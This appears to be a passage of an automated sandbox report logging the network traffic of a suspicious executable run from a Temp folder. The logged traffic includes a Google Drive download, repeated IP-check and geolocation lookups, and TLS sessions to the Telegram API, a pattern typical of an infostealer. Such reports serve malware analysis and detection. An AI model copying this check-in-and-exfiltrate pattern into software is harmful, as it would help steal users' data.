                                                                                                                                                                                  Dec 2, 2024 16:15:19.917561054 CET49790443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:19.917592049 CET44349790172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:20.385404110 CET44349790172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:20.385478973 CET44349790172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:20.385541916 CET49790443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:20.386059999 CET49790443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:20.410005093 CET4978580192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:20.411202908 CET4979580192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:20.532268047 CET8049785132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:20.532385111 CET4978580192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:20.533082962 CET8049795132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:20.533164024 CET4979580192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:20.533407927 CET4979580192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:20.653667927 CET8049795132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:22.028032064 CET8049795132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:22.029530048 CET49797443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:22.029580116 CET44349797172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:22.029644012 CET49797443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:22.029911041 CET49797443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:22.029923916 CET44349797172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:22.069492102 CET4979580192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:23.287336111 CET44349797172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:23.289226055 CET49797443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:23.289262056 CET44349797172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:23.789566994 CET44349797172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:23.789639950 CET44349797172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:23.789717913 CET49797443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:23.790194035 CET49797443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:23.817563057 CET4979580192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:23.818552017 CET4980280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:23.938105106 CET8049795132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:23.938179970 CET4979580192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:23.938604116 CET8049802132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:23.938690901 CET4980280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:23.938836098 CET4980280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:24.058746099 CET8049802132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:25.412378073 CET8049802132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:25.414010048 CET49808443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:25.414050102 CET44349808172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:25.414114952 CET49808443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:25.414382935 CET49808443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:25.414396048 CET44349808172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:25.460160971 CET4980280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:26.677839994 CET44349808172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:26.682204962 CET49808443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:26.682241917 CET44349808172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:27.181318045 CET44349808172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:27.181384087 CET44349808172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:27.181756020 CET49808443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:27.182055950 CET49808443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:27.201011896 CET4980280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:27.202227116 CET4981380192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:27.321633101 CET8049802132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:27.321748018 CET4980280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:27.322272062 CET8049813132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:27.322348118 CET4981380192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:27.322514057 CET4981380192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:27.442536116 CET8049813132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:29.767723083 CET8049813132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:29.768884897 CET49818443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:29.768907070 CET44349818172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:29.768989086 CET49818443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:29.769249916 CET49818443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:29.769263029 CET44349818172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:29.819556952 CET4981380192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:30.985186100 CET44349818172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:30.986866951 CET49818443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:30.986881971 CET44349818172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:31.451370001 CET44349818172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:31.451430082 CET44349818172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:31.451482058 CET49818443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:31.451982021 CET49818443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:31.717325926 CET4981380192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:31.725639105 CET4982280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:31.837878942 CET8049813132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:31.838072062 CET4981380192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:31.845841885 CET8049822132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:31.846096039 CET4982280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:31.848694086 CET4982280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:31.969058037 CET8049822132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:33.322443008 CET8049822132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:33.323678970 CET49826443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:33.323688030 CET44349826172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:33.323764086 CET49826443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:33.323978901 CET49826443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:33.323992014 CET44349826172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:33.366467953 CET4982280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:34.645534992 CET44349826172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:34.647392035 CET49826443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:34.647438049 CET44349826172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:35.123020887 CET44349826172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:35.123095989 CET44349826172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:35.123231888 CET49826443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:35.123871088 CET49826443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:35.147094011 CET4982280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:35.148246050 CET4982980192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:35.267568111 CET8049822132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:35.267627954 CET4982280192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:35.268243074 CET8049829132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:35.268326044 CET4982980192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:35.268507004 CET4982980192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:35.388535023 CET8049829132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:36.781102896 CET8049829132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:36.782597065 CET49834443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:36.782646894 CET44349834172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:36.782737017 CET49834443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:36.782998085 CET49834443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:36.783010006 CET44349834172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:36.835186958 CET4982980192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:38.051265001 CET44349834172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:38.053221941 CET49834443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:38.053261042 CET44349834172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:38.519488096 CET44349834172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:38.519560099 CET44349834172.67.177.134192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:38.519608974 CET49834443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:38.520165920 CET49834443192.168.2.4172.67.177.134
                                                                                                                                                                                  Dec 2, 2024 16:15:38.634038925 CET4982980192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:38.754659891 CET8049829132.226.8.169192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:38.754865885 CET4982980192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:38.773392916 CET49839443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:38.773439884 CET44349839149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:38.773547888 CET49839443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:38.774027109 CET49839443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:38.774041891 CET44349839149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:40.186646938 CET44349839149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:40.186738968 CET49839443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:40.188431025 CET49839443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:40.188447952 CET44349839149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:40.188688040 CET44349839149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:40.189966917 CET49839443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:40.235347986 CET44349839149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:40.699534893 CET44349839149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:40.699620962 CET44349839149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:40.699673891 CET49839443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:40.701879025 CET49839443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:46.739794970 CET4977880192.168.2.4132.226.8.169
                                                                                                                                                                                  Dec 2, 2024 16:15:47.258611917 CET49855443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:47.258666039 CET44349855149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:47.259341955 CET49855443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:47.259341955 CET49855443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:47.259387970 CET44349855149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:48.679929018 CET44349855149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:48.682018995 CET49855443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:48.682055950 CET44349855149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:48.682111979 CET49855443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:48.682120085 CET44349855149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:49.276773930 CET44349855149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:49.276987076 CET44349855149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:49.277051926 CET49855443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:49.277515888 CET49855443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:50.824475050 CET49863443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:50.824517965 CET44349863149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:50.824598074 CET49863443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:50.824882030 CET49863443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:50.824898005 CET44349863149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:52.233424902 CET44349863149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:52.235183954 CET49863443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:52.235204935 CET44349863149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:52.235244036 CET49863443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:52.235259056 CET44349863149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:52.890965939 CET44349863149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:52.891058922 CET44349863149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:52.891117096 CET49863443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 2, 2024 16:15:52.891788960 CET49863443192.168.2.4149.154.167.220
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Dec 2, 2024 16:14:52.240839958 CET5835153192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 2, 2024 16:14:52.379827976 CET53583511.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:55.195259094 CET5568753192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 2, 2024 16:14:55.332689047 CET53556871.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:01.425570011 CET5000553192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 2, 2024 16:15:01.566324949 CET53500051.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:09.297750950 CET6179553192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 2, 2024 16:15:09.438838959 CET53617951.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:38.634716034 CET5547953192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 2, 2024 16:15:38.772115946 CET53554791.1.1.1192.168.2.4
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Dec 2, 2024 16:14:52.240839958 CET192.168.2.41.1.1.10x12e1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:14:55.195259094 CET192.168.2.41.1.1.10xbb54Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:01.425570011 CET192.168.2.41.1.1.10xd55dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:09.297750950 CET192.168.2.41.1.1.10x14feStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:38.634716034 CET192.168.2.41.1.1.10x8adcStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Dec 2, 2024 16:14:52.379827976 CET1.1.1.1192.168.2.40x12e1No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:14:55.332689047 CET1.1.1.1192.168.2.40xbb54No error (0)drive.usercontent.google.com142.250.181.129A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:01.566324949 CET1.1.1.1192.168.2.40xd55dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:01.566324949 CET1.1.1.1192.168.2.40xd55dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:01.566324949 CET1.1.1.1192.168.2.40xd55dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:01.566324949 CET1.1.1.1192.168.2.40xd55dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:01.566324949 CET1.1.1.1192.168.2.40xd55dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:01.566324949 CET1.1.1.1192.168.2.40xd55dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:09.438838959 CET1.1.1.1192.168.2.40x14feNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:09.438838959 CET1.1.1.1192.168.2.40x14feNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 2, 2024 16:15:38.772115946 CET1.1.1.1192.168.2.40x8adcNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                  • drive.google.com
                                                                                                                                                                                  • drive.usercontent.google.com
                                                                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                                                                  • api.telegram.org
                                                                                                                                                                                  • checkip.dyndns.org
                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.449745132.226.8.169807852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 2, 2024 16:15:01.705703974 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 2, 2024 16:15:08.233998060 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:07 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                                                  Dec 2, 2024 16:15:08.253102064 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Dec 2, 2024 16:15:08.971946001 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:08 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                                                  Dec 2, 2024 16:15:11.173847914 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Dec 2, 2024 16:15:11.668648958 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:11 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.449778132.226.8.169807852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 2, 2024 16:15:13.562160969 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Dec 2, 2024 16:15:15.057388067 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:14 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.449785132.226.8.169807852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 2, 2024 16:15:16.914670944 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 2, 2024 16:15:18.656021118 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:18 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.449795132.226.8.169807852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 2, 2024 16:15:20.533407927 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 2, 2024 16:15:22.028032064 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:21 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
